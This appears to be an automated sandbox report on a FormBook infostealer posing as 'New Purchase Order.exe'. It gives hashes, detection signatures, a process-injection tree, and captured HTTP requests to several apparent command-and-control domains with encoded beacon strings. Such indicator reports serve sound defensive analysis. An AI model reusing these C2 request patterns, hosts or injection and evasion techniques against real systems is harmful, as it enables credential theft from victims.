Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name:New Purchase Order.exe
Analysis ID:1567410
MD5:225b541dd84b7d8cbd7cb719a80e4df9
SHA1:192a656a280cf136ac1cc91019bf28b057cc7a50
SHA256:d9984c8e232d51fee8996efff6a296be9fa8f9957435269d0c23e1b1fd4eb061
Tags:exe, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Purchase Order.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 225B541DD84B7D8CBD7CB719A80E4DF9)
    • New Purchase Order.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 225B541DD84B7D8CBD7CB719A80E4DF9)
      • ILRIqlNpKN.exe (PID: 7000 cmdline: "C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • ILRIqlNpKN.exe (PID: 3644 cmdline: "C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
8.2.New Purchase Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.New Purchase Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                No Sigma rule has matched
                No Suricata rule has matched

                AV Detection

                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New Purchase Order.exeJoe Sandbox ML: detected
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ILRIqlNpKN.exe, 0000000B.00000000.1709984253.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp, ILRIqlNpKN.exe, 0000000F.00000000.1887839334.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FAC4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02FAC4E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax12_2_02F99E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h12_2_050B04F8

                Networking

                Source: DNS query: www.cyperla.xyz
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: BETAINTERNATIONALTR BETAINTERNATIONALTR
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:41 GMTserver: Apacheset-cookie: __tad=1733233361.3016953; expires=Fri, 01-Dec-2034 13:42:41 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:44 GMTserver: Apacheset-cookie: __tad=1733233364.5099805; expires=Fri, 01-Dec-2034 13:42:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:47 GMTserver: Apacheset-cookie: __tad=1733233367.6311852; expires=Fri, 01-Dec-2034 13:42:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64C HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyR HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 215Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 13:42:08 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:42:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F74XyXSEwvYmpRFhGdnd2ofG2kgmFNS8MJ5VhoVFeSxsJtVoy09Sv7Q%2FspUfjj%2B53wZGUYlJjYu3iVcal0vOVniH1OTX4Lp0qrtK7sr2g6VE6kvcnlRWrJi1h8vDLy4%2BXwXaIs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fb9c5eb243be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=641&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:42:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwG9GsyzKh8Tcmmhkawf%2FtFCrgXxKWUWRzTYPPIm3wxLM%2Bc8jMYAhgR9b6vtVcqOVkG1D70Y2GcTRKUpYg8gFw9WPNKLbiVNTH4MyllY8gAL2EF9%2F4%2BPEU4VoDq1zBYYCrOnLUo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbad298d5e74-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=661&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:43:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7uIgTGJkdu0J5HgOFJqIUUOn7OrA3zNodPu%2FLBVXZCLb%2Fy7lOHYkgRmJQqc%2FyjJe04k6iezh0MYSjT2WTb0N7MW9Wr3Y%2BuHGqDolMxVxH0G774%2FeIzar7wjlHZWoauoNuz9ddo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbbe28fd0f3d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1674&delivery_rate=0&cwnd=129&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:43:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ko0cyYGrQDO%2BfemQ5%2BhtwJ4ihE76aAWvG2w0uzpHm%2Fb%2FAkYNunuuwqPVN8gzK%2BHqvpliuptxquDeQfauJKdY8Zeb45GSa0VZSFNRvZYsVhLdme1TvheO691VrIyZrGsSnc9nCGQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbd31c69de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=371&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: New Purchase Order.exe, 00000000.00000002.1298865239.00000000032A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2507216654.0000000005224000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bser101pp.buzz
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2507216654.0000000005224000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bser101pp.buzz/v89f/
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2505584035.0000000003478000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.L
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 0000000C.00000003.2002879403.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: isoburn.exe, 0000000C.00000002.2506017590.0000000005D86000.00000004.10000000.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2505584035.00000000032E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042C663 NtClose,8_2_0042C663
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732B60 NtClose,LdrInitializeThunk,8_2_01732B60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01732DF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01732C70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017335C0 NtCreateMutant,LdrInitializeThunk,8_2_017335C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01734340 NtSetContextThread,8_2_01734340
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01734650 NtSuspendThread,8_2_01734650
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BF0 NtAllocateVirtualMemory,8_2_01732BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BE0 NtQueryValueKey,8_2_01732BE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BA0 NtEnumerateValueKey,8_2_01732BA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732B80 NtQueryInformationFile,8_2_01732B80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AF0 NtWriteFile,8_2_01732AF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AD0 NtReadFile,8_2_01732AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AB0 NtWaitForSingleObject,8_2_01732AB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D30 NtUnmapViewOfSection,8_2_01732D30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D10 NtMapViewOfSection,8_2_01732D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D00 NtSetInformationFile,8_2_01732D00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DD0 NtDelayExecution,8_2_01732DD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DB0 NtEnumerateKey,8_2_01732DB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C60 NtCreateKey,8_2_01732C60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C00 NtQueryInformationProcess,8_2_01732C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CF0 NtOpenProcess,8_2_01732CF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CC0 NtQueryVirtualMemory,8_2_01732CC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CA0 NtQueryInformationToken,8_2_01732CA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F60 NtCreateProcessEx,8_2_01732F60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F30 NtCreateSection,8_2_01732F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FE0 NtCreateFile,8_2_01732FE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FB0 NtResumeThread,8_2_01732FB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FA0 NtQuerySection,8_2_01732FA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F90 NtProtectVirtualMemory,8_2_01732F90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732E30 NtWriteVirtualMemory,8_2_01732E30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732EE0 NtQueueApcThread,8_2_01732EE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732EA0 NtAdjustPrivilegesToken,8_2_01732EA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732E80 NtReadVirtualMemory,8_2_01732E80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733010 NtOpenDirectoryObject,8_2_01733010
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733090 NtSetValueKey,8_2_01733090
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017339B0 NtGetContextThread,8_2_017339B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733D70 NtOpenThread,8_2_01733D70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733D10 NtOpenProcessToken,8_2_01733D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05254650 NtSuspendThread,LdrInitializeThunk,12_2_05254650
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05254340 NtSetContextThread,LdrInitializeThunk,12_2_05254340
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_05252D30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D10 NtMapViewOfSection,LdrInitializeThunk,12_2_05252D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_05252DF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DD0 NtDelayExecution,LdrInitializeThunk,12_2_05252DD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C60 NtCreateKey,LdrInitializeThunk,12_2_05252C60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_05252C70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_05252CA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F30 NtCreateSection,LdrInitializeThunk,12_2_05252F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FB0 NtResumeThread,LdrInitializeThunk,12_2_05252FB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FE0 NtCreateFile,LdrInitializeThunk,12_2_05252FE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_05252E80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252EE0 NtQueueApcThread,LdrInitializeThunk,12_2_05252EE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252B60 NtClose,LdrInitializeThunk,12_2_05252B60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_05252BA0
